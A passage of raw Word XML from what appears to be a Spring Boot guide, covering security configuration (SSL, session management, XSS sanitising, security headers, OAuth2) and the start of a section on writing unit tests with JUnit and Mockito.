        <w:t xml:space="preserve"> in your Spring Boot application by configuring an SSL certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD782D"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Example configuration in application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31883B5A"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port=8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5259BFD7"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ssl.key-store=classpath:keystore.jks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58217445"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ssl.key-store-password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16765AC1"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ssl.key-store-type=JKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55844FDD"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server.ssl.key-alias=mykey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF8C280"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This ensures that all communication between the client and the server is encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A93F3" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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9. Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A96E2"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You can configure </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session management</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent attacks like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session fixation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B527D"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F385EF2"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sessionManagement()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F6C71"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maximumSessions(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0FEEB5"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expiredUrl("/login?expired");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514596C8" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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0. Protect Against XSS (Cross-Site Scripting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B64866"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Protect your application from XSS by properly escaping any untrusted data that is displayed on your pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0477C6"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Use libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OWASP Java HTML Sanitizer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSoup</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to sanitize the input data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F73D78C" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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1. Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A20EFFF"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dd security headers to protect the application from attacks like clickjacking and content-sniffing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA3F72E"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E8F22"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headers()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5C2A5"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frameOptions().deny()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24993618"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httpStrictTransportSecurity().includeSubDomains().maxAgeInSeconds(31536000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCFDD4"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01626FF5"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xssProtection().block(true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386DB77C"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and()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424F3B3"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    .contentSecurityPolicy("default-src 'self'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A615A8" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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2. Audit Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699C2FF"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lement audit logging to track sensitive actions and ensure compliance with security policies. For example, log every failed login attempt or changes made by an admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA78F2" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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3. OAuth2 Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E9A42"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For applications that need integration with third-party authentication providers (Google, Facebook, etc.), you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B508E40"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 xml:space="preserve">Spring Security provides </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> support for handling OAuth2 login and token-based authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6DF08A" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>14. Security Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B195F4"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Always follow security best practices like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D297D7" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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Regularly updating your dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65180A04" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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ing strong password policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66451F7B" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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Limiting access to sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D59E55" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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Using firewalls and network security configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1227E4E5" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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Minimizing privilege (principle of least privilege).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F84D9A5" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Implementing two-factor authentication (2FA) if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E481D" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By applying these techniques, you can secure your Spring Boot applications against most common security threats and ensure that your data and users are protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A809762" w14:textId="3E0E9B66" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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lastRenderedPageBreak/>
        <w:pict w14:anchorId="35F9751D">
          <v:rect id="_x0000_i2743" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="507FC8A4" w14:textId="418F22C1" w:rsidR="003B7480" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7480" w:rsidP="003B7480">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="666" w:name="_Toc196308146"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you write unit tests in Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="666"/>
    </w:p>
    <w:p w14:paraId="49112E2E" w14:textId="4F75E12B" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Writing unit tests in Spring Boot is crucial for ensuring the correctness of your application. Spring Boot provides several tools to help you write effective unit tests using frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JUnit</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mockito</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's how you can write unit tests in a Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33258988"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1. Add Testing Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4219F2AF"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Ensure you have the required dependencies for testing in your pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787FF9F7"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For Maven</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A56321"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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D8C021"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lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4F9557"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lt;artifactId&gt;spring-boot-starter-test&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21212544"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lt;scope&gt;test&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9F6285"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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093405C"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For Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C190487"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testImplementation 'org.springframework.boot:spring-boot-starter-test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF99AA"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This includes popular testing libraries like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2546FACE"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JUnit</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for unit testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1087D4"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Mockito</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for mocking dependencies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2837A570"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Spring Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for integration testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D26FDC"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AssertJ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for fluent assertions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A3147"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Hamcrest</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for matchers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE12911"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2. Write Unit Tests Using JUnit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F13477"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Unit tests are typically written using JUnit. Spring Boot's spring-boot-starter-test automatically includes </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JUnit 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@Test annotation) by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476710E"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A simple unit test for a service class might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDBE5ED"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SpringBootTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151085A6"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class MyServiceTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E3EEE6" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0450ACE0"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604AD26"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private MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C733EE2" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4020CC"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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1336EA89"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void testServiceMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD034A1"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String result = myService.someMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7FDA6F"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assertThat(result).isEqualTo("Expected Result");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB94EA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BC9E84"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419E8B2"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Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3100DE17"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SpringBootTest annotation tells Spring Boot to look for the main configuration class (@SpringBootApplication) and use it to configure the test context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954E1A4"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Autowired injects the required service class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860F66B"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Test is a JUnit annotation to mark the method as a test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA364B"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3. Mocking Dependencies with Mockito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0061C9C5"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Often, you need to mock the dependencies of your service classes to isolate the unit you're testing. You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mockito</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to mock the dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42863AF8"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329122F9"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ExtendWith(MockitoExtension.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F77B62"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class MyServiceTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254518AC" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D04F8E"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Mock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088E8F4"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private MyRepository myRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5DC7D5" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC8257F"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InjectMocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5853615C"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private MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CAF9AA" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D8B02C"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    @Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB516A"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void testServiceMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F29A6"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when(myRepository.findById(1L)).thenReturn(Optional.of(new MyEntity()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D8C7E"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MyEntity result = myService.getMyEntity(1L);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D36051"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assertNotNull(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2222D327"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0B4A79"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534CC7D"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Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595AAA7"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Mock: Mocks the MyRepository dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C0C14E"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InjectMocks: Injects the mocked dependencies into the MyService class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C491E5"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when(...).thenReturn(...): Defines the behavior of the mock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1DDFC0"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4. Testing Controller Methods (MockMvc)</w:t>
      </w:r>
    </w:p>
